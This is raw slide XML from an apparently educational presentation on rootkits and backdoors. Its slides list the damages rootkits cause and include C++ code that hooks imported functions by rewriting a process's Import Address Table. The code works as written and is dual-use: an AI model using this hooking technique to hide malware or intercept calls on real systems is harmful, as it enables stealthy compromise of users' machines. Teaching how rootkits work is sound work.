            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6393815"/>
            <a:ext cx="12364085" cy="61023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Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82550" y="967740"/>
            <a:ext cx="12027535" cy="10652125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/**</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 Function to hook functions in the IAT of a the main module of the process.</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 \param lpModuleName : name of the module w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ich contains the function.</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 \param lpFunctionName : name of the function you want to hook.</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 \param lpFunction : pointer of the new function.</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 \return : the pointer of the original function or nullptr if it failed.</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LPVOID IAT::Hook(LPCSTR lpModuleName, LPCSTR lpFunctionName, const LPVOID lpFunction)</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const LPVOID hModule = GetCurrentProcessModule(); //Retrieves a pseudo handle for the current process.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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const auto lpImageDOSHeader = (PIMAGE_DOS_HEADER)(hModule);</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if (lpImageDOSHeader == nullptr)</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return nullptr;</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const auto lpImageNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpImageDOSHeader + lpImageDOSHeader-&gt;e_lfanew);//Go to NT header</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const IMAGE_DATA_DIRECTORY ImportDataDirectory = lpImageNtHeader-&gt;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];//Go to IMPORT</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auto lpImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD_PTR)hModule + ImportDataDirectory.VirtualAddress); //obtain the virtual address for the Import table</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while (lpImageImportDescriptor-&gt;Characteristics != 0) //check if there are imported functions</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const auto lpCurrentModuleName = (LPSTR)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;Name); //dll name</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if (strcmp(lpCurrentModuleName, lpModuleName) != 0) //check if the lpModuleName is found</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpImageImportDescriptor++;</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continue;</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auto lpImageOrgThunkData = (PIMAGE_THUNK_DATA)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;OriginalFirstThunk);</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auto lpImageThunkData = (PIMAGE_THUNK_DATA)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;FirstThunk);</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while (lpImageOrgThunkData-&gt;u1.AddressOfData != 0)</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const auto lpImportData = (PIMAGE_IMPORT_BY_NAME)((DWORD_PTR)lpImageDOSHeader + lpImageOrgThunkData-&gt;u1.AddressOfData);//Import name table</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if (strcmp(lpFunctionName, lpImportData-&gt;Name) == 0)//if the function is found</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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DWORD dwJunk = 0;</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MEMORY_BASIC_INFORMATION mbi;</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 //Retrieves information about a range of pages in the virtual address space of the calling process.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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VirtualQuery(lpImageThunkData, &amp;mbi, sizeof(MEMORY_BASIC_INFORMATION)); </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if (!VirtualProtect(mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &amp;mbi.Protect)) //change the memory for the function to be writtable</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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return nullptr;</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const auto lpOrgFunction = (LPVOID)lpImageThunkData-&gt;u1.Function;</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#if defined _M_IX86</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lpImageThunkData-&gt;u1.Function = (DWORD_PTR)lpFunction;//replace the function with ours</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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#elif defined _M_X64</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lpImageThunkData-&gt;u1.Function = (DWORD_PTR)lpFunction;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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#endif</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if (VirtualProtect(mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &amp;dwJunk))//successful</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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return lpOrgFunction;</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lpImageThunkData++;</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lpImageOrgThunkData++;</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lpImageImportDescriptor++;</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return nullptr;</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a:t>
            </a:r>
            <a:endParaRPr sz="140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505208 -0.748981 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-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Damages</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5" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="634683" y="2271395"/>
            <a:ext cx="10922635" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="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438150">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A728BE"/>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Stealth behavior:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can hide their presence on a system, making it difficult to detect and remove them.</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2700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A728BE"/>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Data theft:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can steal sensitive information such as passwords, credit card numbers, and other personal information.</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2700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A728BE"/>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System modification:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can modify system files and settings, compromising the security and stability of the system.</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2700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A728BE"/>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Spreading of malware:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can also spread other forms of malware, such as viruses and Trojans, to other systems on a network.</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2700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A728BE"/>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Performance degradation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> The presence of a rootkit can slow down the performance of a system and consume valuable system resources.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3"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3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="236220" y="1098550"/>
            <a:ext cx="11828780" cy="102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71500">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>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微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Rootkits can cause a number of significant damages to a computer system or network:</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a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>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endParaRPr lang="en-US" altLang="zh-CN" sz="30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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4260850" y="2934653"/>
            <a:ext cx="7908925" cy="988695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="BF191A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Rootkits </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="BF191A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17"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fld id="{74E7442A-BA00-4274-AC47-95D95C23D1C8}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E13747">
              <a:alpha val="9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9"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01</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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sp>
        <p:nvSpPr>
          <p:cNvPr id="20"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Part One</a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="组合 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="L 形 21"/>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3" name="L 形 22"/>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4" name="L 形 23"/>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5" name="直角三角形 24"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D1202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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426"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7" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103"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0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-2"/>
            <a:ext cx="12191998" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF">
              <a:alpha val="91765"/>
            </a:sysClr>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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278630" y="2934653"/>
            <a:ext cx="7913370" cy="988695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="09DEE9">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Backdoor</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="09DEE9">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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fld id="{74E7442A-BA00-4274-AC47-95D95C23D1C8}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="07A7AF">
              <a:alpha val="9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7"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02</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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Part Two</a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="L 形 9"/>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1" name="L 形 10"/>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2" name="L 形 11"/>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3" name="直角三角形 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="06DCA9">
                <a:lumMod val="5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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426"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5" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103"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Backdoor</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="754380" y="1788795"/>
            <a:ext cx="10683240" cy="3394710"/>
            <a:chOff x="1188" y="2137"/>
            <a:chExt cx="16824" cy="5346"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形 4"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1452" y="2352"/>
              <a:ext cx="16560" cy="5131"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FEF8F6"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="E4374B"/>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4" name="任意多边形 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1719" y="2310"/>
              <a:ext cx="15922" cy="4885"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 7740"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 3770"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 7740"/>
                <a:gd name="connsiteY1" fmla="*/ 3770 h 3770"/>
                <a:gd name="connsiteX2" fmla="*/ 7740 w 7740"/>
                <a:gd name="connsiteY2" fmla="*/ 3770 h 3770"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7740" h="3770">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7740" y="3770"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="FEBF7A"/>
              </a:solidFill>
              <a:prstDash val="sysDash"/>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6" name="椭圆 5"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1334" y="2137"/>
              <a:ext cx="751" cy="629"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FED65A"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="E4374B"/>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8" name="任意多边形 7"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1188" y="2481"/>
              <a:ext cx="1042" cy="389"/>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944" h="421">
                  <a:moveTo>
                    <a:pt x="460" y="0"/>
